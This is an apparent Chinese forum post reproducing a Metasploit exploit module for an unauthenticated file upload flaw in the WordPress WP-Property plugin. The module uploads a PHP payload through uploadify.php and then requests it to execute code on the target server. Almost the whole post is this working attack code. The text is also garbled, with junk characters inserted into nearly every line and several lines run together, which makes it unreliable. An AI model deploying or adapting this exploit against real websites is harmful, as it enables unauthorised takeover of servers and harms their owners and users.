WordPress WP-Property PHP 文件上传漏洞
- L! v8 _& W' m/ J k: R: i
- @5 t- ~& h. e9 g- O7 ]- T- K0 \ ## # This file is part of the Metasploit Framework and may be subject to
1 A$ h+ m% G0 `8 w$ v& L; v1 c! Q% F+ D
# redistribution and commercial restrictions. Please see the Metasploit) p' E: K5 X' ~% ^
; V0 [/ d9 A3 f) i. B, h; G: f# Framework web site for more information on licensing and terms of use.4 y" _1 h" s- J, [2 k8 v- Q
; L+ ~& x Z) Q" u# http://metasploit.com/framework/ ##
8 Y1 G. v+ E W
( u' W2 E) p0 D* S% r, s
& e8 c, y8 z$ d: p' U
7 }$ n8 F: u( x: z; o8 M ) ]- F. F* C/ f! U: P
/ u+ {% C! {; ?" b2 s5 Urequire 'msf/core': U- Y, |0 O8 F: K& ]
require 'msf/core/exploit/php_exe') o* h$ s* C7 N7 g. r% S e: B4 R
, K& C, `- i- ~- A) u; z( q
class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit: hpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability'," w( s; G# V7 s& x1 o3 T
'Description' => %q{
7 {; m2 @1 J6 n: l3 }- d% ~This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' =>3 g/ b- E6 P& G: k9 t
[
+ s+ {. c4 P5 T+ U! r'Sammy FORGIT', # initial discovery( b: s( G4 X- c: s7 ]! y
'James Fitts <fitts.james[at]gmail.com>' # metasploit module+ ~* i+ r0 X( o7 X
],
" U3 B/ L6 i& N; Q7 I# b, A: x( d'License' => MSF_LICENSE,
. p, e7 H. |) J4 p& Y1 p& Z z'References' =>! z! B* c3 i9 `( k8 r) M: n0 ~
[
4 T7 t% N4 S9 m% z[ 'OSVDB', '82656' ],2 p3 f5 T* z0 e- f% \) v6 D
[ 'BID', '53787' ],' y4 e( J- _* }* |
[ 'EDB', '18987'],% _6 z$ a7 i: y1 J! s
[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]% B9 N7 c: n/ k, b1 y) _& o0 |
],
1 _. U( c5 I. s- U S( ~& T'Payload' =>
| G Y4 j/ G{+ P, w2 b2 r. p$ E% S
'BadChars' => "\x00",
( m r% o1 @: v2 W2 T},, {5 x% V+ r" l6 ]2 @& u
'Platform' => 'php',: z% h9 p4 R4 v& W3 X8 L- V7 g6 n
'Arch' => ARCH_PHP,
1 s0 N+ g, u( A: I% R% T$ T'Targets' =>! }7 p9 l+ |% u9 }3 v
[
) `+ |0 I1 S z8 X' f) k! o1 \[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],# W! W5 h Q* J* D1 x+ u3 g/ u
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]2 L9 @. }0 g' B+ Z6 T6 O3 B, @
],) z: N' }8 y& {+ J7 M, m1 ]* o& ?6 E
'DefaultTarget' => 0,9 t8 ]& W9 E4 t- W- e5 N0 p
'DisclosureDate' => 'Mar 26 2012'))
+ h: |/ h0 w9 O0 V# V) ?' b$ {( a
* B0 ^0 n/ ]' z7 jregister_options(
5 |( x9 b& U: j H$ W$ {[
3 T8 P- O* y/ c# C+ d! }OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])% K+ P) @9 w: V8 f) t2 I
], self.class)
' s1 B V" f2 y& dend T) ?2 c0 j" \& b
0 J+ U' v9 W Y- @def check+ C2 [$ u6 r& R2 q- S6 G9 A
uri = target_uri.path
' q9 ^7 V: L* i! M) zuri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET'," D" r1 C$ j5 v L7 @, o# L6 m
'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
( X$ t8 X/ a6 i* L})
4 A* C0 w8 e+ A- \, T- ?; @
3 u* E6 W2 k2 d0 ^# V) z. n, Yif not res or res.code != 200! \5 R( N, n1 n. C: G. z
return Exploit::CheckCode::Unknown T: F3 t2 W% R7 H( ?9 O: p0 B* Z
end
/ H- Q% E1 @' d, Z, l7 x' T# e) N
: I; h8 Z- H0 |, Ureturn Exploit::CheckCode::Appears
' c* Y, _( w0 ?6 U4 Gend
, k: i F. [ c) w" C* w; B9 m# }2 X4 u7 F- }$ n: R
def exploit* K0 l& X2 S: q: R) i5 u- H/ U, d
uri = target_uri.path
' |+ R6 g/ j. G- D' Z c" F8 o }uri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true)
. |/ M$ e0 A2 @7 C% B3 B3 h6 u8 d, v8 N' n. t/ _
data = Rex::MIME::Message.new% V2 o/ f0 e5 _
data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
B7 `) I+ v- Edata.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\""), ^4 d! R* H+ L" B" u A: v9 B
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')) K7 v6 b2 Y, d- t8 T: E- L+ f
# s0 {* T& f* r: G, c
print_status("#{peer} - Uploading payload #{@payload_name}")4 Q+ t* U( r$ R Y" ?8 x" x3 } r
res = send_request_cgi({, d9 R. _! v' L
'method' => 'POST',+ R# ^( q! |" j4 \" J- c
'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",0 l8 j9 k$ ~- Y1 |# B! i6 M9 W! F
'ctype' => "multipart/form-data; boundary=#{data.bound}",
1 X9 {( I; v& ?; @'data' => post_data
- u; R7 Z- k7 O( l: s})
9 l0 Z+ ^2 K e: K" J& G3 F0 q- z0 D, ?. d8 I9 q) Z
if not res or res.code != 200 or res.body !~ /#{@payload_name}/
9 s3 V( s+ k# ^/ i6 Ufail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")$ C. z7 M9 c P9 `
end1 x8 J* A/ Q5 A
% k& G8 F% [0 _& y* B. R" _/ J
upload_uri = res.body0 {- E! P& }: O2 P/ f |
& O. G$ B; R0 W5 h5 z0 c
print_status("#{peer} - Executing payload #{@payload_name}")+ {4 k( H9 t8 e9 t
res = send_request_raw({
$ i [/ p" U Z% H% o' C4 K'uri' => upload_uri,5 A' A# j/ V2 Y
'method' => 'GET'2 t" n- ]: v$ y) e' x
})
" i9 [3 l& h% t* V4 hend) j0 O1 [% V; q' g# T
end, T& E6 m# e5 b o5 O8 }7 Y* H' m
7 G$ [4 q/ N) A2 s# S6 o
不要问我这写的是什么 怎么利用 我是说msf.
" z2 G9 c* r: S4 W+ i/ K( i8 s
1 u. C% |7 X; G# f |
发表于 2013-1-4 19:51:30
收藏
支持
反对